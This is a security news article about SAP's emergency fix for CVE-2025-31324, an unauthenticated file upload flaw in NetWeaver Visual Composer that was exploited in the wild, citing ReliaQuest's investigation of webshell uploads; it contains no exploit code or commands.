- My new favorite headphones for swimming come bundled in a unique charging accessory
- Why I recommend this Windows laptop to creatives and professionals - even if it's meant for gamers
- This HP laptop may be the closest thing to a MacBook Pro for Windows users - and I don't mind it
- If we want a passwordless future, let's get our passkey story straight
- This Week in Scams: $16.6 Billion Lost, Deepfakes Rise, and Google Email Scams Emerge | McAfee Blog
SAP Fixes Critical Vulnerability After Evidence of Exploitation
German software company SAP has finally disclosed and fixed a highly critical vulnerability in the NetWeaver Visual Composer development server after evidence of exploitation in the wild.
NetWeaver Visual Composer is SAP’s web-based modelling tool that allows business process experts and developers to build business application components without requiring manual coding.
The vulnerability, tracked as CVE-2025-31324, is an unauthenticated file upload vulnerability in the Metadata Uploader component of the SAP NetWeaver Visual Composer Framework version 7.50.
When exploited, the vulnerability allows an unauthenticated attacker to upload potentially malicious executable binaries that could severely harm the host system.
“This could significantly affect the confidentiality, integrity and availability of the targeted system,” the CVE.org page for CVE-2025-31324 noted.
The vulnerability has been allocated the highest severity score by SAP, 10.0 (CVSS v3.1).
The German software provider has also released a fix, published in an emergency security update that is only accessible to SAP customers.
Customers have been urged to apply the new versions as soon as possible.
Evidence of Exploitation
The vulnerability was detected by ReliaQuest in April 2025 while investigating multiple customer incidents affecting the technology integration platform SAP NetWeaver, which involved unauthorized file uploads and the execution of malicious files.
In an April 22 article sharing findings from its investigation, ReliaQuest said it initially discovered that attackers had uploaded “JSP webshells” into publicly accessible directories, a move reminiscent of a remote file inclusion (RFI) vulnerability.
Several affected systems were already running the latest SAP service pack and had applied patches made available in SAP’s regular monthly update, released on April 8. This indicated that owners of the affected systems were targeted by a zero-day exploit.
“However, SAP later confirmed it as an unrestricted file upload vulnerability, allowing attackers to upload malicious files directly to the system without authorization,” reads the ReliaQuest report.
ReliaQuest added that the exploitation is likely tied to either a previously disclosed vulnerability like CVE-2017-9844 or an unreported remote file inclusion (RFI) issue. Additionally, attackers employed tools like Brute Ratel and Heaven’s Gate for execution and evasion.
After being contacted by ReliaQuest, SAP, which itself is a CVE Numbering Authority (CNA), publicly reported the vulnerability on April 24 and released a fix.
According to ReliaQuest, SAP’s solutions are likely an attractive target for threat actors for two key reasons.
“First, they are often used by government agencies, meaning that successful compromise of SAP vulnerabilities is likely to facilitate access to government-related networks and information. Second, as SAP solutions are often deployed on-premises, security measures for these systems are left to users; updates and patches that are not applied promptly are likely to expose these systems to greater risk of compromise,” the ReliaQuest researchers wrote.
Photo credits: Kittyfly/T. Schneider/Shutterstock
